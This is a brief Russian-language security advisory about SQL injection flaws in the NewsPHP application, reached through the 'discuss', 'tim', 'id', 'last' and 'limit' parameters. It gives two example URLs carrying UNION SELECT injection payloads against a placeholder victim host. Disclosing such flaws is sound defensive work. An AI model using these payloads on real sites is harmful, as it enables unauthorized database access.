Программа: NewsPHP, возможно более ранние версии

Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"discuss", "tim", "id", "last" и "limit". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://victim/ndex.php?id=-99 union select null,null,null,null,
null,null,null,null,null from newsphp.pro/*
http://victim/index.php?tim=-1 union select null,null,null,null,
null,null,null,null,null from newsphp.pro/*
 



Оставить мнение